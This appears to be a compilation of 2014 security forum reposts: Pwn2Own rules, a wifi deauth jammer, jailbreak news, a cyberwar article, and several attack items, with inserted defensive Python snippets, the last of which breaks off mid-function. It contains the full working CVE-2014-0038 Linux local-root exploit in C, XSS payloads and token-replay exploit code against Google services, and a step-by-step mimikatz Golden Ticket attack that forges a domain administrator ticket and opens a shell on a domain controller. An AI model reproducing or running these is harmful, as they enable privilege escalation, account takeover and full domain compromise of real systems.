The 2014 competition consists of three divisions: Browsers, Plug-Ins, and the Grand Prize. All target machines will be running the latest fully patched versions of the relevant operating systems (Windows 8.1 x64 and OS X Mavericks), installed in their default configurations. The vulnerability or vulnerabilities used in each attack must be unknown and not previously reported to the vendor. A particular vulnerability can only be used once across all categories. The first contestant to successfully compromise a target within the 30-minute time limit wins the prize in that category.

The 2014 targets are:

Browsers:
- Google Chrome on Windows 8.1 x64: $100,000
- Microsoft Internet Explorer 11 on Windows 8.1 x64: $100,000
- Mozilla Firefox on Windows 8.1 x64: $50,000
- Apple Safari on OS X Mavericks: $65,000

Plug-ins:
- Adobe Reader running in Internet Explorer 11 on Windows 8.1 x64: $75,000
- Adobe Flash running in Internet Explorer 11 on Windows 8.1 x64: $75,000
- Oracle Java running in Internet Explorer 11 on Windows 8.1 x64 (requires click-through bypass): $30,000

"Exploit Unicorn" Grand Prize:
- SYSTEM-level code execution on Windows 8.1 x64 on Internet Explorer 11 x64 with EMET (Enhanced Mitigation Experience Toolkit) bypass: $150,000*

Please see the Pwn2Own 2014 rules for complete descriptions of the challenges. In particular, taming the Exploit Unicorn is a multi-step process, and competitors should be as familiar as possible with the necessary sequence of vulnerabilities required:
- The initial vulnerability utilized in the attack must be in the browser.
- The browser's sandbox must be bypassed using a vulnerability in the sandbox.
- A separate privilege escalation vulnerability must be used to obtain SYSTEM-level arbitrary code execution on the target.
- The exploit must work when Microsoft's Enhanced Mitigation Experience Toolkit (EMET) protections are enabled.

In addition to the cash prizes listed above, successful competitors will receive the laptop on which they demonstrate the compromise. They'll also receive 20,000 ZDI reward points, which immediately qualifies them for Silver standing in the benefits program. (ZDI Silver standing includes a one-time $5,000 cash payout, a 15% monetary bonus on all vulnerabilities submitted to ZDI during the next calendar year, a 25% reward-point bonus on all vulnerabilities submitted to ZDI over the next calendar year, and paid travel and registration to attend the 2014 DEFCON conference in Las Vegas.)

As ever, vulnerabilities and exploit techniques revealed by contest winners will be disclosed to the affected vendors, and the proof of concept will become the property of HP in accordance with the HP ZDI program. If the affected vendors wish to coordinate an onsite transfer at the conference venue, HP ZDI is able to accommodate that request. The full set of rules for Pwn2Own 2014 is available here. They may be changed at any time without notice.

Registration

Pre-registration is required to ensure we have sufficient resources on hand in Vancouver. Please contact ZDI at zdi@hp.com to begin the registration process. (Email only, please; queries via Twitter, blog post, or other means will not be acknowledged or answered.) If we receive more than one registration for any category, we'll hold a random drawing to determine contestant order. Registration closes at 5pm Pacific time on March 10, 2014.

Follow the action

Pwn2Own.com will be updated periodically with blogs, photos and videos between now and the competition, and in real time during the event. If it becomes necessary to hold a drawing to determine contestant order, we will also update the site in real time during that process. Follow us on Twitter at @thezdi, and keep an eye on the #pwn2own hashtag for more coverage.

Press: Please direct all Pwn2Own or ZDI-related media inquiries to Cassy Lalan, hpesp@bm.com.

(*Real-life unicorn prize subject to availability)

Source: Pwn2Own 2014: Rules and Unicorns - PWN2OWN
-
[h=1]wifijammer[/h]

Continuously jam all wifi clients and access points within range. The effectiveness of this script is constrained by your wireless card. Alfa cards seem to effectively jam within about a block's range with heavy access point saturation. Granularity is given in the options for more effective targeting.

Requires: airmon-ng, python 2.7, python-scapy, a wireless card capable of injection

[h=2]Usage[/h]

[h=3]Simple[/h]

python wifijammer.py

This will find the most powerful wireless interface and turn on monitor mode. If a monitor mode interface is already up it will use the first one it finds instead. It will then start sequentially hopping channels 1 per second from channel 1 to 11, identifying all access points and clients connected to those access points. On the first pass through all the wireless channels it is only identifying targets. After that the 1 sec per channel time limit is eliminated and channels are hopped as soon as the deauth packets finish sending. Note that it will still add clients and APs as it finds them after the first pass through. Upon hopping to a new channel it will identify targets that are on that channel and send 1 deauth packet to the client from the AP, 1 deauth to the AP from the client, and 1 deauth to the AP destined for the broadcast address to deauth all clients connected to the AP. Many APs ignore deauths to broadcast addresses.

Sursa: https://github.com/DanMcInerney/wifijammer
-
Process Explorer v16.0

By Mark Russinovich

Published: January 29, 2014

Download Process Explorer (1,215 KB)

Introduction

Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded.

The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded. Process Explorer also has a powerful search capability that will quickly show you which processes have particular handles opened or DLLs loaded.

The unique capabilities of Process Explorer make it useful for tracking down DLL-version problems or handle leaks, and provide insight into the way Windows and applications work.

Download

Download Process Explorer (1,215 KB)
Run Process Explorer now from Live.Sysinternals.com

Sursa: Process Explorer
-
iPhone 4s, iPad 2 / 3, iPad mini, iPod touch 5 Jailbroken For Life!

By Ben Reid | February 2nd, 2014

iOS hacker iH8sn0w has discovered a way to untether jailbreak devices powered by the Apple A5(X) processor for life, which includes the iPhone 4s, iPod touch 5, the iPad 2 / 3 and iPad mini. Details are relatively scarce at this moment regarding the iBoot exploit, although if the exploits were ever bound together and released in the form of a jailbreak utility, those in ownership of either device would be able to enjoy a potentially indefinite, untethered jailbreak.

Even though the jailbreak scene is very much a here-and-now kind of pastime in that most enthusiasts are keen to find a way to breach the latest versions, it’s always nice to see progress of any kind. And by the sounds of things, this is a pretty significant inroad.

Taking to his Twitter feed, iH8sn0w posted A5 AES keys:

So looks like all my A5(X) devices are fully untethered and jailbroken for life now. A5 AES Keys anyone? 4S 7.0.4 iBSS -iv 3a0fc879691a5a359973792bcd367277 -k 371e3aea9121d90b8106228bf2b5ee4c638a0b4837fefbd87a3c0aca646e5996

All A5(X) AES Keys will be posted on @icj_’s icj.me/ios/keys as soon as I clean this up a bit more

Then, in speaking to fellow hacker Winocm, one of the guys behind p0sixspwn, iH8sn0w offered something of an insight into how exactly he managed to work the magic:

This isn’t a bootrom exploit. Still a very powerful iBoot exploit though (when exploited properly ;P /cc @winocm).

One follower also noted that iBoot jailbreaks can be patched by Apple on the fly. iH8sn0w responded to this by noting that they can be patched provided that they are released publicly. Also, to further add fuel to this argument, Saurik took to a thread on Reddit to shed some light on the situation:

For informational purposes (as many people reading might not appreciate the difference), to get the encryption keys you only need an "iBoot exploit", not a "bootrom exploit".

It is easier to find iBoot exploits (being later in the boot sequence, it has a larger attack surface: it has to be able to parse filesystems, for example), and they do afford more power over the device than an untethered userland exploit (in addition to letting you derive firmware encryption keys, you can boot custom kernels, and you might be able to dump the bootrom itself), but they are software updatable as part of new firmware releases from Apple and may have "insane setup requirements" (like, you might pretty much need an already-jailbroken device to actually setup the exploit).

You thereby wouldn’t see an iBoot exploit used for a jailbreak (unless everyone is out of ideas for a very long time): instead, you’d see it hoarded away as a "secret weapon" used by jailbreakers to derive these encryption keys, making it easier to find and implement exploits on newer firmware updates for the same device (especially kernel exploits, where even if you have an arbitrary write vulnerability you are "flying blind" and thinking "ok, now where should I write? I can’t see anything… :’(").

But the big question is: will the exploit ever go public? Sadly, it won’t, according to a tweet by Winocm.

There’s no doubt that this is very exciting news, and we’ll be keeping a close eye on what remains a developing sequence of events, so stay tuned!

You can follow us on Twitter, add us to your circle on Google+ or like our Facebook page to keep yourself updated on all the latest from Microsoft, Google, Apple and the Web.

Sursa: iPhone 4s, iPad 2 / 3, iPad mini, iPod touch 5 Jailbroken For Life! | Redmond Pie
-
Two stories about XSS on Google

Story 1. The Little Content Type that Could

The vulnerability was found in Feedburner. First, I created a feed and tried to inject malicious data. No success there. Injected data just wouldn’t show up, only harmless links were presented. I took a few more attempts and then I found lots of messages from PodMedic. PodMedic examines links in every feed. If it finds troubles in creating a feed, it reports the cause of such troubles. The messages read that links are incorrect because the content type returned was a text type. Hmm. Ok. I bet the content type on this page isn't filtered. A simple script for my server:

<?php
header('Content-Type: text/<img src=z onerror=alert(document.domain)>; charset=UTF-8');
?>

And here it is:

Story 2. The Little Callback that Could

The Feedburner vulnerability was not satisfying. It was quite simple, actually. So I decided to try something else. APIs Explorer on developers.google.com caught my attention after some searching. Google’s APIs Explorer is a tool that helps you to explore various Google APIs interactively. Google also says that with the APIs Explorer, we can browse quickly through available APIs and versions, see methods available for each API and what parameters they support along with inline documentation and blah blah blah. In fact I was interested in cross-domain messaging based on postMessage. A link to the Google API that we are testing can be given in the Base parameter:

https://developers.google.com/apis-explorer/?base=https://webapis-discovery.appspot.com/_ah/api#p/

The Base parameter is filtered by certain regular expressions (not quite accurately though) but it is easy to bypass them using a %23 symbol:

https://developers.google.com/apis-explorer/?base=https://evil.com%23webapis-discovery.appspot.com/_ah/api#p/admin/reports_v1/

As a result, an iframe with src=evil.com is created and now we’re waiting for messages from it. Every message should have two tokens. First token is in window.name of the iframe, second is given in location.hash. I sniffed messages from https://webapis-discovery.appspot.com/_ah/api and wrote a page that would send the same messages with valid tokens. It worked nicely, and I tried to inject some HTML data. No success though. I could change text, image locations but it would not be enough for XSS. There was a documentation link, the location of which could be changed. So I changed it to javascript:alert(document.domain) and it worked perfectly. Still not enough. It required user interaction, but I really don't like it. Users never do what you want them to do (click that wrong link, for instance).

So I found a page on developers.google.com with the callback function (almost all developers think that callbacks are secure). I added redirection to this page with the callback ‘parent.document.links[0].click’ to my exploit after creating the documentation link via postMessage. (Symbols [ and ] were filtered, so actually the callback was as follows: document.body.lastElementChild.previousSibling.lastElementChild.firstElementChild.firstElementChild.lastElementChild.firstElementChild.firstElementChild.firstElementChild.nextSibling). Let’s try it:

Done! Works fine and no need for user interaction. The exploit was as follows:

token_1 = location.hash.split('rpctoken=')[1];
token_2 = window.name;
send_payload(data,token_1,token_2);
window.setTimeout('document.location=callback_url;',3000); // Paused because of slow internet connection…

And of course I made a cool screenshot.

I liked that method of exploiting and tried to use it in other services. I used it to steal an OAuth token and to buy any app at Google Play using users’ payment details. Besides, the app could automatically be installed on user’s android device. The Google Security Team also liked that technique and they described it on OWASP AppSec Eu as Reverse Clickjacking.

Posted by Paul Axe at 6:03

Sursa: @Paul_Axe : Two stories about XSS on Google
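Both stories above come down to trusting a value that an outsider controls: a third-party Content-Type header reflected into HTML, and a `base` URL parameter checked for the presence of a trusted host name rather than for its actual host. The following Python is an added example (not code from the original post, and the allow-list, function names and the naive check are my own assumptions) showing the defensive version of both checks: the media type is validated against the RFC 7231 token grammar and HTML-escaped, and the URL is parsed once after decoding so that a `%23` fragment can no longer smuggle the trusted name past the check.

```python
import html
import re
from urllib.parse import urlsplit, unquote

# RFC 7231 token characters; a media type is token "/" token.  Anything
# outside this grammar ('<', '>', spaces, ...) cannot be a real media type.
_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
_MEDIA_TYPE = re.compile(rf"^{_TOKEN}/{_TOKEN}$")


# Story 1: reflect a third-party Content-Type value into an HTML report.
def describe_content_type(raw_header):
    """Return the HTML snippet a PodMedic-style checker would emit for the
    Content-Type header it got back from a feed link.  The value is validated
    against the token grammar and HTML-escaped in every branch, so
    'text/<img src=z onerror=...>' never reaches the page as markup."""
    media_type = raw_header.split(";", 1)[0].strip()
    if _MEDIA_TYPE.match(media_type):
        return "<p>Content type returned was %s</p>" % html.escape(media_type)
    return "<p>Invalid content type: %s</p>" % html.escape(media_type)


# Story 2: the 'base' parameter of an API explorer must point at the real API.
TRUSTED_BASE_HOSTS = {"webapis-discovery.appspot.com"}  # assumed allow-list


def naive_base_check(base_param):
    """The kind of presence test the post describes as bypassable: it only
    asks whether the trusted host name appears somewhere in the value."""
    return "webapis-discovery.appspot.com" in unquote(base_param)


def strict_base_check(base_param):
    """Decode the parameter once, parse it as a URL and accept it only if the
    scheme is https and the host is exactly an allow-listed one.  The parser
    drops everything after '#', so 'https://evil.com#webapis-discovery...'
    yields the host 'evil.com' and is rejected."""
    parts = urlsplit(unquote(base_param))
    return parts.scheme == "https" and parts.hostname in TRUSTED_BASE_HOSTS


if __name__ == "__main__":
    # Constructed inputs taken from the two stories.
    print(describe_content_type(
        "text/<img src=z onerror=alert(document.domain)>; charset=UTF-8"))
    for base in ("https://webapis-discovery.appspot.com/_ah/api",
                 "https://evil.com%23webapis-discovery.appspot.com/_ah/api"):
        print(base, "naive:", naive_base_check(base),
              "strict:", strict_base_check(base))
```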
-
recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)

Details: http://seclists.org/oss-sec/2014/q1/187

/*
 *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
 recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
 CVE-2014-0038 / x32 ABI with recvmmsg
 by rebel @ irc.smashthestack.org
 -----------------------------------

 takes about 13 minutes to run because timeout->tv_sec is decremented
 once per second and 0xff*3 is 765.

 some things you could do while waiting:
 * watch 3 times
 * read https://wiki.ubuntu.com/Security/Features and smirk a few times
 * brew some coffee
 * stare at the countdown giggly with anticipation

 could probably whack the high bits of some pointer with nanoseconds,
 but that would require a bunch of nulls before the pointer and then
 reading an oops from dmesg which isn't that elegant.

 &net_sysctl_root.permissions is nice because it has 16 trailing nullbytes

 hardcoded offsets because I only saw this on ubuntu & kallsyms is
 protected anyway..

 same principle will work on 32bit but I didn't really find any major
 distros shipping with CONFIG_X86_X32=y

 user@ubuntu:~$ uname -a
 Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
 user@ubuntu:~$ gcc recvmmsg.c -o recvmmsg
 user@ubuntu:~$ ./recvmmsg
 byte 3 / 3.. ~0 secs left.
 w00p w00p!
 # id
 uid=0(root) gid=0(root) groups=0(root)
 # sh phalanx-2.6b-x86_64.sh
 unpacking..

 greets to my homeboys kaliman, beist, capsl & all of #social

 Sat Feb 1 22:15:19 CET 2014
 % rebel %
 *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
 */

#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/utsname.h>
#include <time.h>   /* for time(), used to seed rand() */

/* recvmmsg as seen through the x32 ABI: the syscall number carries the x32 bit */
#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define VLEN 1
#define BUFSIZE 200

int port;

/* per-kernel addresses; kallsyms is protected, so they are hardcoded */
struct offset {
    char *kernel_version;
    unsigned long dest;             // net_sysctl_root + 96
    unsigned long original_value;   // net_ctl_permissions
    unsigned long prepare_kernel_cred;
    unsigned long commit_creds;
};

struct offset offsets[] = {
    {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
    {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40},    // Ubuntu 13.10
    {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500},    // Ubuntu 13.04
    {NULL,0,0,0,0}
};

/* forked child: counts down (one second per decrement of tv_sec) and then
   sends a single UDP datagram to wake up the blocked recvmmsg() call */
void udp(int b) {
    int sockfd;
    struct sockaddr_in servaddr,cliaddr;
    int s = 0xff+1;

    if(fork() == 0) {
        while(s > 0) {
            fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
            sleep(1);
            s--;
            fprintf(stderr,".");
        }
        sockfd = socket(AF_INET,SOCK_DGRAM,0);
        bzero(&servaddr,sizeof(servaddr));
        servaddr.sin_family = AF_INET;
        servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
        servaddr.sin_port=htons(port);
        sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
        exit(0);
    }
}

/* touching a net sysctl entry calls through the overwritten permissions pointer */
void trigger() {
    open("/proc/sys/net/core/somaxconn",O_RDONLY);

    if(getuid() != 0) {
        fprintf(stderr,"not root, ya blew it!\n");
        exit(-1);
    }

    fprintf(stderr,"w00p w00p!\n");
    system("/bin/sh -i");
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

// thx bliss
static int __attribute__((regparm(3))) getroot(void *head, void * table) {
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

void __attribute__((regparm(3))) trampoline() {
    asm("mov $getroot, %rax; call *%rax;");
}

int main(void) {
    int sockfd, retval, i;
    struct sockaddr_in sa;
    struct mmsghdr msgs[VLEN];
    struct iovec iovecs[VLEN];
    char buf[BUFSIZE];
    long mmapped;
    struct utsname u;
    struct offset *off = NULL;

    uname(&u);
    for(i=0;offsets[i].kernel_version != NULL;i++) {
        if(!strcmp(offsets[i].kernel_version,u.release)) {
            off = &offsets[i];
            break;
        }
    }

    if(!off) {
        fprintf(stderr,"no offsets for this kernel version..\n");
        exit(-1);
    }

    /* user-space landing page at the address the clobbered pointer will hold */
    mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));
    mmapped &= 0x000000ffffffffff;

    srand(time(NULL));
    port = (rand() % 30000)+1500;

    commit_creds = (_commit_creds)off->commit_creds;
    prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;

    mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);

    if(mmapped == -1) {
        perror("mmap()");
        exit(-1);
    }

    memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);
    memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);

    if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
        perror("mprotect()");
        exit(-1);
    }

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
        perror("socket()");
        exit(-1);
    }

    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(port);

    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
        perror("bind()");
        exit(-1);
    }

    memset(msgs, 0, sizeof(msgs));
    iovecs[0].iov_base = &buf;
    iovecs[0].iov_len = BUFSIZE;
    msgs[0].msg_hdr.msg_iov = &iovecs[0];
    msgs[0].msg_hdr.msg_iovlen = 1;

    /* the timeout pointer is aimed at the bytes to be decremented, one per round */
    for(i=0;i < 3 ;i++) {
        udp(i);
        retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);

        if(!retval) {
            fprintf(stderr,"\nrecvmmsg() failed\n");
        }
    }

    close(sockfd);
    fprintf(stderr,"\n");
    trigger();
}

Sursa: [C] recvmmsg.c - Pastebin.com
-
If This Is Cyberwar, Where Are All the Cyberweapons?

The discovery of Stuxnet in 2010 seemed to herald a new age of cyberwar, but that age has yet to materialize.

By Paul F. Roberts on January 27, 2014

Like the atomic bomb in the waning days of World War II, the computer virus known as Stuxnet, discovered in 2010, seemed to usher in a new era of warfare. In the era of cyberwar, experts warned, silent, software-based attacks will take the place of explosive ordnance, tanks, and machine guns, or at least set the stage for them.

Or maybe not. Almost four years after it was first publicly identified, Stuxnet is an anomaly: the first and only cyberweapon ever known to have been deployed. Now some experts in cybersecurity and critical infrastructure want to know why. Are there fewer realistic targets than suspected? Are such weapons more difficult to construct than realized? Or is the current generation of cyberweapons simply too well hid?

Such questions were on the minds of the world’s top experts in the security of industrial control systems last week at the annual S4 conference outside Miami. S4 gathers the world’s top experts on the security of nuclear reactors, power grids, and assembly lines.

At S4 there was broad agreement that—long after Stuxnet’s name has faded from the headlines—industrial control systems like the Siemens Programmable Logic Controllers are still vulnerable. Eireann Leverett, a security researcher at the firm IOActive, told attendees at the conference that commonplace security practices in the world of enterprise information technology are still uncommon among vendors who develop industrial control systems (see “Protecting Power Grids from Hackers Is a Huge Challenge”). Leverett noted that modern industrial control systems, which sell for thousands of dollars per unit, often ship with software that lacks basic security controls like user authentication, code signing to prevent unauthorized software updates, or event logging to allow customers to track changes to the device.

It is also clear that, in the years since Stuxnet came to light, developed and developing nations alike have seized on cyber operations as a fruitful new avenue for research and development (see “Welcome to the Malware Industrial Complex”). Laura Galante, a former U.S. Department of Defense intelligence analyst who now works for the firm Mandiant, said that the U.S. isn’t just tracking the activities of nations like Russia and China, but also Syria and Stuxnet’s target of choice: Iran. Galante said cyberweapons give smaller, poorer nations a way to leverage asymmetric force against much larger foes.

Even so, truly effective cyberweapons require extraordinary expertise. Ralph Langner, perhaps the world’s top authority on the Stuxnet worm, argues that the mere hacking of critical systems doesn’t count as cyberwarfare. For example, Stuxnet made headlines for using four exploits for “zero day” (or previously undiscovered) holes in the Windows operating system. But Langner said the metallurgic expertise needed to understand the construction of Iran’s centrifuges was far more impressive. Those who created Stuxnet needed to know the exact amount of pressure or torque needed to damage aluminum rotors within them, sabotaging the country’s uranium enrichment operation.

Concentrating on software-based tools that can cause physical harm sets a much higher bar for discussions of cyberweapons, Langner argues. By that standard, Stuxnet was a true cyberweapon, but the 2012 Shamoon attack against the oil giant Saudi Aramco and other oil companies was not, even though it erased the hard drives of the computers it infected.

Some argue that the conditions for using such a destructive cyberweapon simply haven’t arisen again—and aren’t likely to for a while. Operations like Stuxnet—stealth projects designed to slowly degrade Iran’s enrichment capability over years—are the exception rather than the rule, said Thomas Rid of the Department of War Studies at Kings College in London. “There are not too many targets that would lend themselves to a covert campaign as Stuxnet did,” Rid said. Rid told attendees that the quality of the intelligence gathered on a particular target makes the difference between an effective cyberweapon and a flop.

It’s also possible that other cyberweapons have been used, but the circumstances surrounding their use are a secret, locked up by governments as “classified” information, or protected by strict nondisclosure agreements. Indeed, Langner, who works with some of the world’s leading industrial firms and governments, said he knows of one other true physical cyberattack, this one tied to a criminal group. But he wouldn’t talk about it.

Industrial control professionals and academics complain that the information needed to research future attacks is being kept out of the public domain. And public utilities, industrial firms, and owners of critical infrastructure are just now becoming aware that systems they assumed were cordoned off from the public Internet very often are not.

Meanwhile, technology is driving even more rapid and transformative changes as part of what’s called the Internet of things. Ubiquitous Internet connectivity combined with inexpensive and tiny computers and sensors will soon allow autonomous systems to communicate directly with each other (see “Securing the Smart Home, from Toasters to Toilets”). Without proper security features built into industrial products from the get-go, the potential for attacks and physical harm increases dramatically. “If we continue to ignore the problem, we are going to be in deep trouble,” Langner said.
Sursa: Where Are All the Cyberweapons? | MIT Technology Review
-
[h=1]mimikatz - Golden Ticket[/h]

[h=2]Introduction[/h]

We have a new feature again in mimikatz called Golden Ticket provided by Benjamin Delpy aka gentilkiwi. With this technique, we can basically access any resource in the domain. Here is the list of what you need to make it work:

krbtgt user's NTLM hash (e.g. from a previous NTDS.DIT dump)
Username that we'd like to impersonate
Domain name
Domain's SID

As you can see, exploiting this architectural flaw is not trivial, because we need the NTLM hash of the krbtgt user and that requires hacking a Domain Controller first. But once that is done we can play with it for some time, because the hash of the krbtgt user will not change for a while. As you know mimikatz can dump and replay the existing tickets on Windows, so when we got access to a server or workstation and dumped the tickets we can easily replay those on another computer and get access to the same resource. See Google for more info.

[h=2]Attack[/h]

When we have everything from the list above, we can create a new TGT ticket with mimikatz and grant access to anything in the domain. Let's see an example. First we look for a domain administrator:

C:\Users\evilhacker>net group "domain admins" /domain
The request will be processed at a domain controller for domain ctu.domain.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            schema.Admin             Jack.Bauer

Administrator is good for us, so we create a TGT ticket with the Kerberos user's hashed password and make it look like as if Administrator asked for an access to a share. Now let's get the Domain SID. The easiest way to do that is just to use "whoami /user" and remove the last part of the SID, or if we have PsTools then PsGetsid.exe comes in handy:

C:\Users\evilhacker\Documents\mimikatz>PsGetsid.exe CTU.DOMAIN

PsGetSid v1.44 - Translates SIDs to names and vice versa
Copyright (C) 1999-2008 Mark Russinovich
Sysinternals - www.sysinternals.com

SID for CTU.DOMAIN\CTU.DOMAIN:
S-1-1-12-123456789-1234567890-123456789

Now we have everything to start the attack. First we list the existing Kerberos tickets; if there are any we can remove those with the purge command (but it is not necessary) and then we can create the Golden Ticket and pass that.

C:\Users\evilhacker\Documents\mimikatz>mimikatz.exe

  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Jan 21 2014 15:06:17)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 14 modules * * */

mimikatz # kerberos::list

[00000000] - 17
   Start/End/MaxRenew: 1/24/2014 12:46:49 PM ; 1/24/2014 9:23:28 PM ; 1/31/2014 11:23:28 AM
   Server Name       : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
   Client Name       : evilhacker @ CTU.DOMAIN
   Flags 60a00000    : pre_authent ; renewable ; forwarded ; forwardable ;
   ...

mimikatz # kerberos::purge
Ticket(s) purge for current session is OK

mimikatz # kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
Admin  : Administrator
Domain : CTU.DOMAIN
SID    : S-1-1-12-123456789-1234567890-123456789
krbtgt : deadbeefboobbabe003133700009999
Ticket : Administrator.kiribi
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz # kerberos::ptt Administrator.kiribi
Ticket 'Administrator.kiribi' successfully submitted for current session

mimikatz # kerberos::list

[00000000] - 17
   Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1/24/2034 12:52:13 PM
   Server Name       : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
   Client Name       : Administrator @ CTU.DOMAIN
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;

mimikatz # kerberos::tgt
Keberos TGT of current session :
   Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1/24/2034 12:52:13 PM
   Service Name (02) : krbtgt ; CTU.DOMAIN; @ CTU.DOMAIN
   Target Name  (--) : @ CTU.DOMAIN
   Client Name  (01) : Administrator ; @ CTU.DOMAIN
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;
   Session Key       : (17) : 5b 1a f2 fb f2 4d 2c 70 9c 3f 36 80 82 0c 23 37
   Ticket            : (00 - 17) : [...]

(NULL session key means allowtgtsessionkey is not set to 1)

Now you can mount any share or use any RPC related tool that you like.

C:\Users\evilhacker\Documents\mimikatz>net use i: \\dc01.ctu.domain\c$
The command completed successfully.

C:\Users\evilhacker\Documents\mimikatz>net use
New connections will be remembered.

Status       Local     Remote                    Network

-------------------------------------------------------------------------------
OK           I:        \\dc01.ctu.domain\c$      Microsoft Windows Network
The command completed successfully.

OR

C:\Users\evilhacker\Documents\pstools>PsExec.exe \\dc01.ctu.domain\ cmd.exe

PsExec v2.0 - Execute processes remotely
Copyright (C) 2001-2013 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>hostname
DC01

C:\Windows\system32>exit
cmd.exe exited on dc01.ctu.domain\ with error code 0.

Some additional notes:

Mimikatz does not require SE_DEBUG or other privilege to create and pass TGT

[h=2]Mitigation[/h]

I am not aware of any good mitigation for this. Please let me know if you do.

[h=2]Greetings[/h]

Thanks to Kristof Feiszt for support, Benjamin `gentilkiwi` Delpy for mimikatz

[h=2]Author[/h]

Balazs Bucsay - mimikatz[!at!]rycon[!dot!]hu - rycon.hu - 2014. 01. 24.

Sursa: rycon.hu - mimikatz's Golden Ticket
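One thing the listings in the post above make visible is that a forged TGT is not bounded by the KDC: the golden ticket's End is ten years and its MaxRenew twenty years after Start, while the legitimately issued TGT expires the same day, and the ticket's client principal (Administrator) is not the account that owns the logon session (evilhacker). The following Python is an added example (not part of the original post or of mimikatz) that parses ticket listings in the `Start/End/MaxRenew` layout shown above and flags TGTs whose lifetimes exceed the domain's Kerberos policy or whose client name differs from the logon account; the policy limits are the Active Directory defaults and the sample listing is constructed from the values in the post.

```python
import re
from datetime import datetime, timedelta

# Active Directory default Kerberos policy ("Maximum lifetime for user ticket"
# and "Maximum lifetime for user ticket renewal").  Assumed defaults; set them
# to the real domain policy when running this against your own listings.
MAX_TICKET_AGE = timedelta(hours=10)
MAX_RENEW_AGE = timedelta(days=7)

_TIME_FMT = "%m/%d/%Y %I:%M:%S %p"
_ENTRY = re.compile(r"^\s*\[[0-9a-fA-F]{8}\]")
_TIMES = re.compile(r"Start/End/MaxRenew:\s*(.+?)\s*;\s*(.+?)\s*;\s*(.+)")
_FIELD = re.compile(r"^\s*(Server Name|Client Name)\s*:\s*(.+?)\s*$")
_FLAGS = re.compile(r"^\s*Flags\s+[0-9a-fA-F]+\s*:\s*(.*)$")


def parse_ticket_list(text):
    """Split a kerberos::list style listing into one dict per '[0000000x]' entry."""
    tickets, cur = [], None
    for line in text.splitlines():
        if _ENTRY.match(line):
            cur = {"flags": []}
            tickets.append(cur)
            continue
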